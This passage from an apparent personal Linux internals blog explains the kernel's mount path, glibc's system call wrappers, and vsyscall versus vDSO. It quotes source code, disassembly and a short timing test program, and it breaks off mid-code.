int mnt_flags, const char *name, void *data)
{
struct file_system_type *type;
struct user_namespace *user_ns = current->nsproxy->mnt_ns->user_ns;
struct vfsmount *mnt;
int err;
if (!fstype)
return -EINVAL;
type = get_fs_type(fstype);
if (!type)
return -ENODEV;
if (user_ns != &init_user_ns) {
if (!(type->fs_flags & FS_USERNS_MOUNT)) {
put_filesystem(type);
return -EPERM;
}
/* Only in special cases allow devices from mounts
* created outside the initial user namespace.
*/
if (!(type->fs_flags & FS_USERNS_DEV_MOUNT)) {
flags |= MS_NODEV;
mnt_flags |= MNT_NODEV | MNT_LOCK_NODEV;
}
if (type->fs_flags & FS_USERNS_VISIBLE) {
if (!fs_fully_visible(type, &mnt_flags)) {
put_filesystem(type);
return -EPERM;
}
}
}
mnt = vfs_kern_mount(type, flags, name, data);
if (!IS_ERR(mnt) && (type->fs_flags & FS_HAS_SUBTYPE) &&
!mnt->mnt_sb->s_subtype)
mnt = fs_set_subtype(mnt, fstype);
put_filesystem(type);
if (IS_ERR(mnt))
return PTR_ERR(mnt);
err = do_add_mount(real_mount(mnt), path, mnt_flags);
if (err)
mntput(mnt);
return err;
}
</code></pre></div></div>
<p>The mainly function called by ‘do_new_mount’ is ‘vfs_kern_mount’ and ‘do_add_mount’.
‘do_new_mount’ create and initialize a new ‘mount’ to represent this new mount.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfsmount *
vfs_kern_mount(struct file_system_type *type, int flags, const char *name, void *data)
{
struct mount *mnt;
struct dentry *root;
if (!type)
return ERR_PTR(-ENODEV);
mnt = alloc_vfsmnt(name);
if (!mnt)
return ERR_PTR(-ENOMEM);
if (flags & MS_KERNMOUNT)
mnt->mnt.mnt_flags = MNT_INTERNAL;
root = mount_fs(type, flags, name, data);
if (IS_ERR(root)) {
mnt_free_id(mnt);
free_vfsmnt(mnt);
return ERR_CAST(root);
}
mnt->mnt.mnt_root = root;
mnt->mnt.mnt_sb = root->d_sb;
mnt->mnt_mountpoint = mnt->mnt.mnt_root;
mnt->mnt_parent = mnt;
lock_mount_hash();
list_add_tail(&mnt->mnt_instance, &root->d_sb->s_mounts);
unlock_mount_hash();
return &mnt->mnt;
}
</code></pre></div></div>
<p>It then calls ‘mount_fs’, in this function it calls the system type registered ‘mount’ callback. The ‘mount’ callback read the device’s super_block and return the ‘dentry’ of the ‘super_block’. Then it initializes the struct ‘mount’.</p>
<p>After ‘vfs_kernel_mount’ finishes it calls ‘do_new_mount’, this function adds this new mount to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int do_add_mount(struct mount *newmnt, struct path *path, int mnt_flags)
{
struct mountpoint *mp;
struct mount *parent;
int err;
mnt_flags &= ~MNT_INTERNAL_FLAGS;
mp = lock_mount(path);
if (IS_ERR(mp))
return PTR_ERR(mp);
parent = real_mount(path->mnt);
err = -EINVAL;
if (unlikely(!check_mnt(parent))) {
/* that's acceptable only for automounts done in private ns */
if (!(mnt_flags & MNT_SHRINKABLE))
goto unlock;
/* ... and for those we'd better have mountpoint still alive */
if (!parent->mnt_ns)
goto unlock;
}
/* Refuse the same filesystem on the same mount point */
err = -EBUSY;
if (path->mnt->mnt_sb == newmnt->mnt.mnt_sb &&
path->mnt->mnt_root == path->dentry)
goto unlock;
err = -EINVAL;
if (d_is_symlink(newmnt->mnt.mnt_root))
goto unlock;
newmnt->mnt.mnt_flags = mnt_flags;
err = graft_tree(newmnt, parent, mp);
unlock:
unlock_mount(mp);
return err;
}
</code></pre></div></div>
<p>Notice here the ‘newmount’ is the new created mount represents the new deivce.
And the ‘path’ is the directory that the device will be attached. This function does some check (for example, the same file system can’t be attached to the directory twice) and then calls ‘graft_tree’. ‘graft_tree’ calls ‘attach_recursive_mnt’ to add this new mount to system.</p>
<p>The most important is to set the relation of the new vfsmount and the parent vfsmount.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> mnt_set_mountpoint(dest_mnt, dest_mp, source_mnt);
commit_tree(source_mnt);
</code></pre></div></div>
glibc system call wrapper2019-02-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/17/glibc-syscall-wrapper
<h3> Introduction </h3>
<p>glic uses two method to make a wrapper for system calls: one is uses the make-system.sh script to wrap and the other is uses a function and some MACROS to wrap.</p>
<p>After we configure and make glibc source code we can find there is a ‘sysd-syscalls’ file in ‘~/glibc-2.27/build’ directory. In the file, we can see if one system call is generated by script, it has following shape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #### CALL=dup NUMBER=32 ARGS=i:i SOURCE=-
ifeq (,$(filter dup,$(unix-syscalls)))
unix-syscalls += dup
$(foreach p,$(sysd-rules-targets),$(foreach o,$(object-suffixes),$(objpfx)$(patsubst %,$p,dup)$o)): \
$(..)sysdeps/unix/make-syscalls.sh
$(make-target-directory)
(echo '#define SYSCALL_NAME dup'; \
echo '#define SYSCALL_NARGS 1'; \
echo '#define SYSCALL_SYMBOL __dup'; \
echo '#define SYSCALL_NOERRNO 0'; \
echo '#define SYSCALL_ERRVAL 0'; \
echo '#include <syscall-template.S>'; \
echo 'weak_alias (__dup, dup)'; \
echo 'hidden_weak (dup)'; \
) | $(compile-syscall) $(foreach p,$(patsubst %dup,%,$(basename $(@F))),$($(p)CPPFLAGS))
endif
</code></pre></div></div>
<p>If one system call is generated by c file, it has following shape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #### CALL=open NUMBER=2 ARGS=Ci:siv SOURCE=sysdeps/unix/sysv/linux/open.c
#### CALL=profil NUMBER=- ARGS=i:piii SOURCE=sysdeps/unix/sysv/linux/profil.c
#### CALL=ptrace NUMBER=101 ARGS=i:iiii SOURCE=sysdeps/unix/sysv/linux/ptrace.c
#### CALL=read NUMBER=0 ARGS=Ci:ibn SOURCE=sysdeps/unix/sysv/linux/read.c
</code></pre></div></div>
<h3> Script wrapper </h3>
<p>There are three kind of files related with script wrapper:
One ‘make-syscall.sh’ file, one ‘syscall-template.S’ file, and some ‘syscalls.list’ files.</p>
<p>The ‘glibc-2.27/sysdeps/unix/make-syscall.sh’ is a script, it reads ‘syscalls.list’ file and parses every line to generate a wrapper for system call.</p>
<p>The ‘syscalls.list’ has following shape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # File name Caller Syscall name Args Strong name Weak names
accept - accept Ci:iBN __libc_accept accept
access - access i:si __access access
acct - acct i:S acct
adjtime - adjtime i:pp __adjtime adjtime
bind - bind i:ipi __bind bind
chdir - chdir i:s __chdir chdir
chmod - chmod i:si __chmod chmod
</code></pre></div></div>
<p>This file specify the system call’s name argument, etc.</p>
<p>There are several syscalls.list file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> sysdeps/unix/syscalls.list
sysdeps/unix/sysv/linux/syscalls.list
sysdeps/unix/sysv/linux/generic/syscalls.list
sysdeps/unix/sysv/linux/x86_64/syscalls.list
</code></pre></div></div>
<p>‘syscall-template.S’ is a template file used in every script wrapper system call.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <sysdep.h>
/* This indirection is needed so that SYMBOL gets macro-expanded. */
#define syscall_hidden_def(SYMBOL) hidden_def (SYMBOL)
#define T_PSEUDO(SYMBOL, NAME, N) PSEUDO (SYMBOL, NAME, N)
#define T_PSEUDO_NOERRNO(SYMBOL, NAME, N) PSEUDO_NOERRNO (SYMBOL, NAME, N)
#define T_PSEUDO_ERRVAL(SYMBOL, NAME, N) PSEUDO_ERRVAL (SYMBOL, NAME, N)
#define T_PSEUDO_END(SYMBOL) PSEUDO_END (SYMBOL)
#define T_PSEUDO_END_NOERRNO(SYMBOL) PSEUDO_END_NOERRNO (SYMBOL)
#define T_PSEUDO_END_ERRVAL(SYMBOL) PSEUDO_END_ERRVAL (SYMBOL)
#if SYSCALL_NOERRNO
/* This kind of system call stub never returns an error.
We return the return value register to the caller unexamined. */
T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
ret_NOERRNO
T_PSEUDO_END_NOERRNO (SYSCALL_SYMBOL)
#elif SYSCALL_ERRVAL
/* This kind of system call stub returns the errno code as its return
value, or zero for success. We may massage the kernel's return value
to meet that ABI, but we never set errno here. */
T_PSEUDO_ERRVAL (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
ret_ERRVAL
T_PSEUDO_END_ERRVAL (SYSCALL_SYMBOL)
#else
/* This is a "normal" system call stub: if there is an error,
it returns -1 and sets errno. */
T_PSEUDO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
ret
T_PSEUDO_END (SYSCALL_SYMBOL)
#endif
syscall_hidden_def (SYSCALL_SYMBOL)
</code></pre></div></div>
<p>There are three kind of system call which is defined by ‘T_PSEUDO’, ‘T_PSEUDO_NOERRNO’ and ‘T_PSEUDO_ERRVAL’. If ‘SYSCALL_NOERRNO’ is defined then the system call is wrapped by ‘T_PSEUDO_NOERRNO’, this means the wrapper doesn’t return error code, for example the ‘getpid’ and ‘umask’ system call. If ‘SYSCALL_ERRVAL’ is defined then the system call is wrapped by ‘T_PSEUDO_ERRVAL’, this means the wrapper return the kernel error code directly. If neither ‘SYSCALL_NOERRNO’ nor ‘SYSCALL_ERRVAL’ are defined then the system call is wrapped by ‘T_PSEUDO’, this means the wrapper will return -1 on errors and copy the return value(error) to errno varaible.</p>
<p>‘T_PSEUDO’, ‘T_PSEUDO_NOERRNO’ and ‘T_PSEUDO_ERRVAL’ are in ‘sysdep.h’, which in ‘glibc-2.27/sysdeps/unix/sysv/linux/x86_64/sysdep.h’.</p>
<p>First of let’s see ‘PSEUDO_NOERRNO’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef PSEUDO_NOERRNO
# define PSEUDO_NOERRNO(name, syscall_name, args) \
.text; \
ENTRY (name) \
DO_CALL (syscall_name, args)
# undef PSEUDO_END_NOERRNO
# define PSEUDO_END_NOERRNO(name) \
END (name)
</code></pre></div></div>
<p>Following is definition of ‘DO_CALL’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef DO_CALL
# define DO_CALL(syscall_name, args) \
DOARGS_##args \
movl $SYS_ify (syscall_name), %eax; \
syscall;
</code></pre></div></div>
<p>‘DO_ARGS_##args’ extends the arguments of system call. The kernel uses the following parameters:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> syscall number rax
arg 1 rdi
arg 2 rsi
arg 3 rdx
arg 4 r10
arg 5 r8
arg 6 r9
</code></pre></div></div>
<p>However normal function call in userspace including calls to system call stub how the following parameters:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> system call number in the DO_CALL macro
arg 1 rdi
arg 2 rsi
arg 3 rdx
arg 4 rcx
arg 5 r8
arg 6 r9
</code></pre></div></div>
<p>So the DOARGS_x has following definition:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # define DOARGS_0 /* nothing */
# define DOARGS_1 /* nothing */
# define DOARGS_2 /* nothing */
# define DOARGS_3 /* nothing */
# define DOARGS_4 movq %rcx, %r10;
# define DOARGS_5 DOARGS_4
# define DOARGS_6 DOARGS_5
</code></pre></div></div>
<p>This means only when the system call has >=4 arguments it need to move %rcx argument to %r10.</p>
<p>The ‘SYS_ify’ is defined as fowllowing:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef SYS_ify
#define SYS_ify(syscall_name) __NR_##syscall_name
</code></pre></div></div>
<p>So the ‘DO_CALL’ MACRO makes the system call’s arguments and moves system call number to %eax and executes ‘syscall’ instruction.</p>
<p>The ‘ENTRY’ and ‘END’ of ‘PSEUDO_NOERRNO’ MACRO is following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /* Define an entry point visible from C. */
#define ENTRY(name) \
.globl C_SYMBOL_NAME(name); \
.type C_SYMBOL_NAME(name),@function; \
.align ALIGNARG(4); \
C_LABEL(name) \
cfi_startproc; \
CALL_MCOUNT
#undef END
#define END(name) \
cfi_endproc; \
ASM_SIZE_DIRECTIVE(name)
</code></pre></div></div>
<p>No speical just some standard definition.</p>
<p>So for ‘PSEUDO_NOERRNO’, this means the system doesn’t return error, so glibc doesn’t need to do anything for the return value.</p>
<p>For ‘PSEUDO_ERRVAL’, it just return the negtive number of error.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef PSEUDO_ERRVAL
# define PSEUDO_ERRVAL(name, syscall_name, args) \
.text; \
ENTRY (name) \
DO_CALL (syscall_name, args); \
negq %rax
# undef PSEUDO_END_ERRVAL
# define PSEUDO_END_ERRVAL(name) \
END (name)
</code></pre></div></div>
<p>For ‘PSEUDO’, it checks the return value with -4095, if the return value >= -4095(0xfffffffffffff001), this means the system call in kernel returns an error. glibc to ‘SYSCALL_ERROR_LABEL’ to handle this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef PSEUDO
# define PSEUDO(name, syscall_name, args) \
.text; \
ENTRY (name) \
DO_CALL (syscall_name, args); \
cmpq $-4095, %rax; \
jae SYSCALL_ERROR_LABEL
# undef PSEUDO_END
# define PSEUDO_END(name) \
SYSCALL_ERROR_HANDLER \
END (name)
</code></pre></div></div>
<p>‘SYSCALL_ERROR_LABEL’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # ifdef PIC
# define SYSCALL_ERROR_LABEL 0f
# else
# define SYSCALL_ERROR_LABEL syscall_error
# endif
</code></pre></div></div>
<p>For no PIC defined:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define syscall_error __syscall_error
int
__attribute__ ((__regparm__ (1)))
__syscall_error (int error)
{
__set_errno (-error);
return -1;
}
</code></pre></div></div>
<p>So for ‘PSEUDO’, the glibc set the errno with the kernel return error adn return -1 for the wrapper function.</p>
<p>Following is an example of dup system call wrapper.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 00000000000e4ea0 <dup>:
e4ea0: b8 20 00 00 00 mov $0x20,%eax
e4ea5: 0f 05 syscall
e4ea7: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax
e4ead: 73 01 jae e4eb0 <dup+0x10>
e4eaf: c3 retq
e4eb0: 48 8b 0d b1 8f 2c 00 mov 0x2c8fb1(%rip),%rcx # 3ade68 <.got+0x108>
e4eb7: f7 d8 neg %eax
e4eb9: 64 89 01 mov %eax,%fs:(%rcx)
e4ebc: 48 83 c8 ff or $0xffffffffffffffff,%rax
e4ec0: c3 retq
e4ec1: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
e4ec8: 00 00 00
e4ecb: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
</code></pre></div></div>
<h3> C file wrapper </h3>
<p>As I have said, there are another C file wrapper, it defines system call wrapper in a C file. For example ‘sysd-syscalls’ has following line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #### CALL=read NUMBER=0 ARGS=Ci:ibn SOURCE=sysdeps/unix/sysv/linux/read.c
</code></pre></div></div>
<p>Both ‘__libc_read’ and ‘__read_nocancel’ will call:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> INLINE_SYSCALL_CALL (read, fd, buf, nbytes);
#define INLINE_SYSCALL_CALL(...) \
__INLINE_SYSCALL_DISP (__INLINE_SYSCALL, __VA_ARGS__)
</code></pre></div></div>
<p>So ‘INLINE_SYSCALL_CALL’ will extend to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __INLINE_SYSCALL_DISP (__INLINE_SYSCALL, read, fd, buf, nbytes)
#define __INLINE_SYSCALL_DISP(b,...) \
__SYSCALL_CONCAT (b,__INLINE_SYSCALL_NARGS(__VA_ARGS__))(__VA_ARGS__)
</code></pre></div></div>
<p>MACRO __INLINE_SYSCALL_NARGS(read, fd, buf, nbytes) extend to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __INLINE_SYSCALL_NARGS_X (read, fd, buf, nbytes,7,6,5,4,3,2,1,0,)
</code></pre></div></div>
<p>This will finally generate to 3.</p>
<p>So ‘ __INLINE_SYSCALL_DISP (__INLINE_SYSCALL, read, fd, buf, nbytes)’ is extended to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __INLINE_SYSCALL3(read, fd, buf, nbytes)
</code></pre></div></div>
<p>As:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define __INLINE_SYSCALL3(name, a1, a2, a3) \
INLINE_SYSCALL (name, 3, a1, a2, a3)
</code></pre></div></div>
<p>extended to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> INLINE_SYSCALL(read, 3, fd, buf, nbytes)
</code></pre></div></div>
<p>This MACRO is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef INLINE_SYSCALL
# define INLINE_SYSCALL(name, nr, args...) \
({ \
unsigned long int resultvar = INTERNAL_SYSCALL (name, , nr, args); \
if (__glibc_unlikely (INTERNAL_SYSCALL_ERROR_P (resultvar, ))) \
{ \
__set_errno (INTERNAL_SYSCALL_ERRNO (resultvar, )); \
resultvar = (unsigned long int) -1; \
} \
(long int) resultvar; })
</code></pre></div></div>
<p>Here go to the ‘INTERNAL_SYSCALL’ MACRO:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef INTERNAL_SYSCALL
#define INTERNAL_SYSCALL(name, err, nr, args...) \
internal_syscall##nr (SYS_ify (name), err, args)
</code></pre></div></div>
<p>For ‘internal_syscall3’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef internal_syscall3
#define internal_syscall3(number, err, arg1, arg2, arg3) \
({ \
unsigned long int resultvar; \
TYPEFY (arg3, __arg3) = ARGIFY (arg3); \
TYPEFY (arg2, __arg2) = ARGIFY (arg2); \
TYPEFY (arg1, __arg1) = ARGIFY (arg1); \
register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \
register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \
register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \
asm volatile ( \
"syscall\n\t" \
: "=a" (resultvar) \
: "0" (number), "r" (_a1), "r" (_a2), "r" (_a3) \
: "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \
(long int) resultvar; \
})
</code></pre></div></div>
<p>So this function finally makes the three arguments and trigger syscall and return ‘resultvar’.</p>
<p>Go to ‘INLINE_SYSCALL’ MACRO:</p>
<p>If ‘resultvar’ is an error, glibc assign this -resultvar to errno and return -1 as the wrapper’s return value.</p>
vsyscall and vDSO2019-02-13T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/13/vsyscall-and-vdso
<h3> Introduction </h3>
<p>Though there is a very good article to introduce <a href="https://0xax.gitbooks.io/linux-insides/content/SysCall/linux-syscall-3.html">vsyscalls and vDSO</a>. I still write this to strengthen my understanding.</p>
<p>The application in user space triggers system call to kernel to do some privileged work. It is an expensive operation containing trapping to kernel and returning. If the application triggers a system call very often, there will be remarkable performance influence. The vsyscall and vDSO are designed to speed up some certain easy system calls.</p>
<h3> vsyscalls </h3>
<p>virtual system call(vsyscall) is the first mechanism in Linux kernel to try to accelerate the execution of some certain system calls. The idea behind vsyscall is simple. Some system call just return data to user space. If the kernel maps these system call implementation and the related-data into user space pages. Then the application can just trigger these system call like a trivial function call. There will be no context switch between user space and kernel space. We can found this vsyscall pages in kernel <a href="https://github.com/torvalds/linux/blob/16f73eb02d7e1765ccab3d2018e0bd98eb93d973/Documentation/x86/x86_64/mm.txt">documentation</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ffffffffff600000 - ffffffffffdfffff (=8 MB) vsyscalls
</code></pre></div></div>
<p>We can see this in process:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ cat /proc/self/maps | grep vsyscall
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
test@ubuntu:~$
</code></pre></div></div>
<p>As we can see, this address is fixed in every process. Th fixed address is considered to violate the ASLR as this allow the attack to write exploit more easy. So the original vsyscall is discarded. But some very old program need this vsyscall page. In order to make them happy, the kernel doesn’t get rid of vsyscall page instead implement a mechanism called emulated vsyscall. We will talk about this vsyscall.</p>
<p>Mapping vsyscall page occurs in Linux kernel initialization. In the call chain start_kernel->setup_arch->map_vsyscall, the last call is to setup vsyscall page. The code of map_vsyscall shows below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init map_vsyscall(void)
{
extern char __vsyscall_page;
unsigned long physaddr_vsyscall = __pa_symbol(&__vsyscall_page);
if (vsyscall_mode != NATIVE)
vsyscall_pgprot = __PAGE_KERNEL_VVAR;
if (vsyscall_mode != NONE)
__set_fixmap(VSYSCALL_PAGE, physaddr_vsyscall,
__pgprot(vsyscall_pgprot));
BUILD_BUG_ON((unsigned long)__fix_to_virt(VSYSCALL_PAGE) !=
(unsigned long)VSYSCALL_ADDR);
}
</code></pre></div></div>
<p>First get the physical address of the vsyscall page. It is __vsyscall_page and the contents of this page is below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __vsyscall_page:
mov $__NR_gettimeofday, %rax
syscall
ret
.balign 1024, 0xcc
mov $__NR_time, %rax
syscall
ret
.balign 1024, 0xcc
mov $__NR_getcpu, %rax
syscall
ret
.balign 4096, 0xcc
.size __vsyscall_page, 4096
</code></pre></div></div>
<p>The vsyscall contains three system call, gettimeofday, time and getcpu.</p>
<p>After we get the physical address of the ‘__vsyscall_page’, we check vsyscall_mode and set the fix-mapped address for vsyscall page with the __set_fixmap macro. If the ‘vsyscall_mode’ is not native, we set ‘vsyscall_pgprot’ to ‘__PAGE_KERNEL_VVAR’, this means the user space can only read this page. If it is native, it can execute.
Note both of the two prot allow the user space to access this page.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define __PAGE_KERNEL_VSYSCALL (__PAGE_KERNEL_RX | _PAGE_USER)
#define __PAGE_KERNEL_VVAR (__PAGE_KERNEL_RO | _PAGE_USER)
</code></pre></div></div>
<p>Here we don’t dig into the ‘__set_fixmap’ function and just know that it sets mapping in the vsyscall page virtual address to physical address.</p>
<p>Finally check that virtual address of the vsyscall page is equal to the value of the ‘VSYSCALL_ADDR’.</p>
<p>Now the start address of the vsyscall page is the ffffffffff600000. glibc or application can call the three system call just in vsyscall page.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define VSYSCALL_ADDR_vgettimeofday 0xffffffffff600000
#define VSYSCALL_ADDR_vtime 0xffffffffff600400
#define VSYSCALL_ADDR_vgetcpu 0xffffffffff600800
</code></pre></div></div>
<p>In emulate mode, the access of vsyscall page will trigger page fault and ‘emulate_vsyscall’ will be called. This function get the syscall number from address:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> vsyscall_nr = addr_to_vsyscall_nr(address);
static int addr_to_vsyscall_nr(unsigned long addr)
{
int nr;
if ((addr & ~0xC00UL) != VSYSCALL_ADDR)
return -EINVAL;
nr = (addr & 0xC00UL) >> 10;
if (nr >= 3)
return -EINVAL;
return nr;
}
</code></pre></div></div>
<p>Here we can see only the three address is valid. This is also helpful to mitigate the ROP chain using this vsyscall page.</p>
<p>After the check, it calls the system call function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> switch (vsyscall_nr) {
case 0:
ret = sys_gettimeofday(
(struct timeval __user *)regs->di,
(struct timezone __user *)regs->si);
break;
case 1:
ret = sys_time((time_t __user *)regs->di);
break;
case 2:
ret = sys_getcpu((unsigned __user *)regs->di,
(unsigned __user *)regs->si,
NULL);
break;
}
</code></pre></div></div>
<p>So as we can see here, the performance of this emulated vsyscall is even more than just do system call directly.</p>
<h3> vDSO </h3>
<p>As I have said, the vsyscall is discarded and replaced by virtual dynamic shared object(vDSO). The difference between the vsyscall and vDSO is that vDSO maps memory pages into each process as a shared object, but vsyscall is static in memory and has the same address every time in every process. All userspace application that dynamically link to glibc will use vDSO automatically. For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~# ldd /bin/ls
linux-vdso.so.1 (0x00007ffed38da000)
libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007fab27f0a000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fab27b19000)
libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3
...
</code></pre></div></div>
<p>We can see every time the vdso has a differenct load address.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~# cat /proc/self/maps | grep vdso
7ffd2307f000-7ffd23081000 r-xp 00000000 00:00 0 [vdso]
root@ubuntu:~# cat /proc/self/maps | grep vdso
7ffce17c7000-7ffce17c9000 r-xp 00000000 00:00 0 [vdso]
root@ubuntu:~# cat /proc/self/maps | grep vdso
7ffe581ca000-7ffe581cc000 r-xp 00000000 00:00 0 [vdso]
root@ubuntu:~#
</code></pre></div></div>
<p>vdso is initialized in ‘init_vdso’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int __init init_vdso(void)
{
init_vdso_image(&vdso_image_64);
#ifdef CONFIG_X86_X32_ABI
init_vdso_image(&vdso_image_x32);
#endif
</code></pre></div></div>
<p>‘vdso_image_64/x32’ is in a generated source file arch/x86/entry/vdso/vdso-image-64.c. These source code files generated by the vdso2c program from the different source code files, represent different approaches to call a system call like int 0x80, sysenter and etc. The full set of the images depends on the kernel configuration.</p>
<p>For example for the x86_64 Linux kernel it will contain vdso_image_64:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> const struct vdso_image vdso_image_64 = {
.data = raw_data,
.size = 8192,
.text_mapping = {
.name = "[vdso]",
.pages = pages,
},
.alt = 3673,
.alt_len = 52,
.sym_vvar_start = -12288,
.sym_vvar_page = -12288,
.sym_hpet_page = -8192,
.sym_pvclock_page = -4096,
};
</code></pre></div></div>
<p>vdso_image contains the data of vDSO image.</p>
<p>Where the raw_data contains raw binary code of the 64-bit vDSO system calls which are 2 page size:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct page *pages[2];
</code></pre></div></div>
<p>‘init_vdso_image’ initialize some of the ‘vdso_image’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init init_vdso_image(const struct vdso_image *image)
{
int i;
int npages = (image->size) / PAGE_SIZE;
BUG_ON(image->size % PAGE_SIZE != 0);
for (i = 0; i < npages; i++)
image->text_mapping.pages[i] =
virt_to_page(image->data + i*PAGE_SIZE);
apply_alternatives((struct alt_instr *)(image->data + image->alt),
(struct alt_instr *)(image->data + image->alt +
image->alt_len));
}
</code></pre></div></div>
<p>When the kernel loads a binary to memory, it calls ‘arch_setup_additional_pages’ and this function calls ‘map_vdso’.</p>
<p>Note the ‘map_vdso’ need also map a vvar region. The vDSO implements four system calls</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __vdso_clock_gettime;
__vdso_getcpu;
__vdso_gettimeofday;
__vdso_time.
root@ubuntu:~# readelf -s vdso.so
Symbol table '.dynsym' contains 10 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000a40 619 FUNC WEAK DEFAULT 12 clock_gettime@@LINUX_2.6
2: 0000000000000cb0 352 FUNC GLOBAL DEFAULT 12 __vdso_gettimeofday@@LINUX_2.6
3: 0000000000000cb0 352 FUNC WEAK DEFAULT 12 gettimeofday@@LINUX_2.6
4: 0000000000000e10 21 FUNC GLOBAL DEFAULT 12 __vdso_time@@LINUX_2.6
5: 0000000000000e10 21 FUNC WEAK DEFAULT 12 time@@LINUX_2.6
6: 0000000000000a40 619 FUNC GLOBAL DEFAULT 12 __vdso_clock_gettime@@LINUX_2.6
7: 0000000000000000 0 OBJECT GLOBAL DEFAULT ABS LINUX_2.6
8: 0000000000000e30 41 FUNC GLOBAL DEFAULT 12 __vdso_getcpu@@LINUX_2.6
9: 0000000000000e30 41 FUNC WEAK DEFAULT 12 getcpu@@LINUX_2.6
</code></pre></div></div>
<h3> experienment </h3>
<p>From above we know that the time consume of three mechanism to trigger system call.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> emulated vsyscall > native syscall > vDSO syscall
</code></pre></div></div>
<p>I wrote the simple test program to test the time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <sys/syscall.h>
time_t (*f)(time_t *tloc) = 0xffffffffff600400;
int main(int argc, char **argv)
{
unsigned long i = 0;
if(!strcmp(argv[1], "1")) {
for (i = 0; i < 1000000;++i)
f(NULL);
} else if (!strcmp(argv[1], "2")) {
for (i = 0; i < 1000000;++i)
time(NULL);
} else {
for (i = 0; i < 1000000; ++i)
syscall(SYS_time, NULL);
}
return 0;
